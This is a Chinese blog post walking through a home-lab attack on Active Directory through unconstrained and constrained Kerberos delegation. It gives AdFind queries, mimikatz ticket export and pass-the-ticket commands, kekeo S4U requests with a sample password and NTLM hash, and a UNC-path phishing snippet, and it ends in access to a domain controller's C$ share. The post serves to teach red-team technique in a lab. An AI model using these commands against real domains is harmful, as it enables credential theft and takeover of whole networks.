内网渗透—横向移动&非约束委派&约束委派

已于 2024-09-09 23:29:55 修改
阅读量909 收藏 25
点赞数 15
分类专栏: 内网渗透 文章标签: 非约束委派 约束委派 kekeo Adfind
于 2024-09-06 19:17:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76227305/article/details/141951907
版权

前言

今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。

实验环境

Web:192.168.145.137,192.168.22.28
DC:192.168.22.30

非约束委派

原理

原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TGT存储在lsass进程中以便下次使用,而我们的机器A就可以利用这个TGT伪装成域管理员去访问DC。

利用

当我们取得一台具有非约束委派权限的域内主机时,我们可以诱导DC来访问受控主机,拿到域管理员的TGT,从而伪装身份。

环境搭建

首先来到域控中,右键我们的Web主机,选择属性。

选择信任此计算机的任何委派。

接着输入命令,才能够在用户属性中找到委派。

setspn -U -A priv/test weige

接着我们到对应的用户,右键属性,也是选择信任此用户的任何委派。

实验测试

这里先让web主机上线CS先,然后提权为system,把Adfind这个工具上传到web服务器。

下载地址:Download AdFind (softpedia.com)

查询域内有非委派约束权限的用户,可以看到我们上面设置的weige这个账号。

AdFind.exe -b "DC=god,DC=local" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

查询域内设置了非约束委派的主机,也是可以看到我们上面设置的WLW—PC。

AdFind.exe -b "DC=god,DC=local" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

我们这里先清除一下票据。

mimikatz kerberos::purge 清除凭证
shell klist purge 查看当前凭证

尝试访问DC,显示拒绝访问。

dir \\DC.god.local\c$

这里我们想办法诱导DC访问Web主机才行,可以做个网页钓鱼。不过就现实来说DC几乎不会去访问网页,也不会去访问域内主机,除非不小心点到了。

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.22.30">
</body>
</html>

这里我就懒得搞网页了,直接让DC连接Web主机吧。

net use \\WLW-PC

此时我们导出票据。

mimikatz sekurlsa::tickets /export

看一下票据,Administrator的就是DC的票据。

接着导入票据,好吧,这里不知道为啥失败了,明明昨天实验一把成功,今天又出问题了。那我直接拿一下别人的图片吧,其实到这里不用说你们也知道咋利用了。

图片引用:内网横向移动—非约束委派&约束委派_横向移动委派-CSDN博客

mimikatz kerberos::ptt [0;bbd89]-2-0-60a00000-Administrator@krbtgt-god.local.kirbi

访问域控。

约束委派

原理

由于非约束委派的不安全性,微软在windows server2003中引入了约束委派,对Kerberos协议进行了拓展,引入了sservice for user to self(S4U2Self)和Service for user to Proxy(S4U2proxy)。

利用

约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。

环境搭建

与非约束委派不同的是,约束委派选择仅信任指定服务,找到域控主机名,并选择服务类型为cifs添加。

找到相对应的用户,配置也是一样的。

实验测试

查询具有约束委派权限的用户。

AdFind -b "DC=god,DC=local" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

查询设置了约束委派的主机。

AdFind -b "DC=god,DC=local" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

由于域内主机想要访问域控,就必须要有TGT和ST。上面我们说过为了安全,Kerberos协议引入了S4U2Self和S4U2proxy。kekeo是一个模拟Kerberos认证的工具,我们可以用使用kekeo去申请TGT,明文或者hash都行,不要再问密码哪里来的了.

kekeo "tgt::ask /user:weige /domain:god.local /password:#abc123" "exit"   

kekeo "tgt::ask /user:weige /domain:god.local /NTLM:579da618cfbfa85247acf1f800a280a4" "exit"

通过这刚刚生成的TGT伪造s4u请求以Administrator用户身份去访问域控的的CIFS的ST,S4U2Self 获取到的 ST1 以及 S4U2Proxy 获取到的 AD-2008 CIFS 服务的 ST2 会保存在当前⽬录下。

kekeo.exe "tgs::s4u /tgt:TGT_weige@GOD.LOCAL_krbtgt~god.local@GOD.LOCAL.kirbi /user:Administrator@god.local /service:cifs/DC.god.local" "exit""
//第一个斜杠后面的是上面生成的TGT,第二个是以administrator的用户去申请,记得加上域名,第三个则是域控全名

会在当前目录下生成两个票据。

接着导入票据,一般来说都是导入这个名字最长的票据,如过不知道就两个都试试。

mimikatz kerberos::ptt TGS_Administrator@god.local@GOD.LOCAL_cifs~DC.god.local@GOD.LOCAL.kirbi

成功访问域控。

dir \\DC.god.local\c$

总结

非约束委派和约束委派的最大区别就是,一个是信任此计算机的任何委派,一个只是信任指定委派。从实际运用来说,非约束委派由于要让DC进行连接才能获得票据,所以有点鸡肋,就不如约束委派。其实说来说去,本质都是票据的伪造,然后进行票据传递。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

脸红ฅฅ*的思春期
关注
专栏目录
内网安全——横向移动&约束委派&约束委派&资源的约束委派
m0_61506558的博客
02-18 683
委派攻击分类:1、约束性委派2、约束性委派3、基于资源的约束性委派横向移动-原理利用约束委派约束委派
红队内网攻防渗透:内网渗透内网对抗:横向移动篇&Kerberos&委派安全&RBCD资源&Operators组成员&HTLMRelay结合
HACKONE的博客
06-23 425
基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。所以核心就是谁或什么权限能修改msDS-AllowedToActOnBehalfOfOtherIdentity。
内网渗透之域内横向移动
hackzkaq的博客
11-18 609
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 hash 介绍 全在域环境中,用户信息存储在域控的ntds.dit(C:\Windows\NTDS\NTDS.dit)中; 域环境也就是在工作组环境中,当前主机用户的密码信息存储着在sam文件(C:\Windows\System32\config\SAM)。 Windows操作系统通常使用两种方法(LM和NTLM)对用户的明文密码进行加密处理。 LM只能存储小于等于14个字符的密码hash 如果密码大于14个,windows就自动使用NTLM
内网渗透----横向移动
浅笑996的博客
05-31 1184
SMB WMI 使用wmic查询远程主机进程信息: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief 创建进程: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process cal...
内网渗透——横向移动
LainWith的博客
10-09 2472
目录环境利用Windows计划任务【借助明文账密】利用 at 建立连接利用 schtasks 建立连接哈希值传递攻击哈希传递攻击适用情况知识背景PTH漏洞原理实操PTKPTT——MS14-068方式1:使用mimikatz方式2:使用kekeo方式3:利用本地票据(需管理员权限)Impacket中的Atexec【支持明文&哈希】其他协议——SMB服务利用使用psexec使用smbexec【支持明文&哈希】其他协议——WMI服务利用【支持明文&哈希】1. 自带WMIC命令,明文传递,无
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 1938
内网环境下的横向移动总结
内网渗透学习04——域内横向移动
box
02-24 5719
文章目录0x00 Windows系统密码和Hash获取分析和防范1. Windows 系统密码和Hash获取1.1 使用工具将散列值和明文从内存中导出。1.2 通过SAM和System文件抓取密码1.3Mimikatz 在线读取Hash和密码明文1.4 Mimikatz 离线读取Hash和密码明文1.5 Nishang2. 防范密码和Hash凭证窃取0x01 哈希传递攻击和防范0x02 IPC1. IPC 入侵2. 计划任务 at schtasksatschtasks3. impacket 工具包
红队内网攻防渗透:内网渗透内网对抗:横向移动篇&Kerberos&委派安全&约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 338
机器A(域控)访问具有约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4410
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTH: PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
红队内网攻防渗透:内网渗透内网对抗:横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec
HACKONE的博客
06-23 149
如果端口开了,先使用ping 能ping通说明防火墙可能是关的,正向和反向都可以 如果是ping不通就是开的, 开的就要看winrm开没开。下载对应release,建立socks连接,设置socks代理,配置规则,调用!是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。不加 --local-auth执行都是失败的 会访问域并且执行名利。主要参数:-u用户,-p密码,-H哈希值,-d指定域,-x执行命令。主要功能:多协议探针,字典设置,本地及域喷射,命令回显执行等。
内网渗透测试:内网横向移动基础总结
zhangge3663的博客
10-27 4782
作者:WHOAMI,转载于freebuf。 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5857
内网渗透测试:内网横向移动基础总结 横向移动内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
内网渗透-内网横向移动的九种方式
lza20001103的博客
04-14 2134
内网横向移动的九种方式
内网渗透-最实用的横向移动总结
告白的博客
10-04 5884
0x00 内网横向移动简介 上期介绍了内网的信息收集,接下来一度时间实现内网横向移动内网的渗透过程一一介绍,通过内网主机掌控整个域环境。 0x01 内网横向移动的两种方式 内网横向移动的方式有传递和漏洞两种: 所谓传递就是通过内置的一系列协议与命令,例如:at,schtasks,psexec,smbexec,wmic,PTH,PTT,PTK等,实现达到渗透其他内网主机,所谓的内网渗透其实就是一个内网的信息收集,掌握了域内的账户密码信息,主机信息,也就掌握了整个域,我们就是要通过横向移动的方式去获取到
第135天:内网安全-横向移动&约束委派&约束委派&数据库攻防
最新发布
weixin_71529930的博客
08-24 663
约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有约束委派权限的机器。
红蓝对抗下的内网横向移动渗透技术详解
lurenjia404的博客
07-02 2250
本文主要介绍了利用远程服务进行横向渗透的方法,读者阅读本章内容后就能够理解,红队人员一旦通过外部某一个点进入了企业内部网络之中,那么内网之中所有的安全防护设备将会形同虚设,红队人员在内网之中获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内网横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能够对内网安全体系建设引起更多的重视和思考。
onvif device manager 找不到ipc_内网渗透 | 基于IPC的横向移动
weixin_39761822的博客
11-26 422
基于IPC的横向移动文章内容引用较多,尽量不说废话,注明链接的地方,请自行阅读并理解。IPC$的概念IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。IPC$的作用利用IPC$,连接者可以与目标主机建立一个连接,利用这个连接...
内网安全】横向移动-域渗透之资源约束委派
今天是几号的博客
04-06 918
基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。计算机加⼊域时,加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值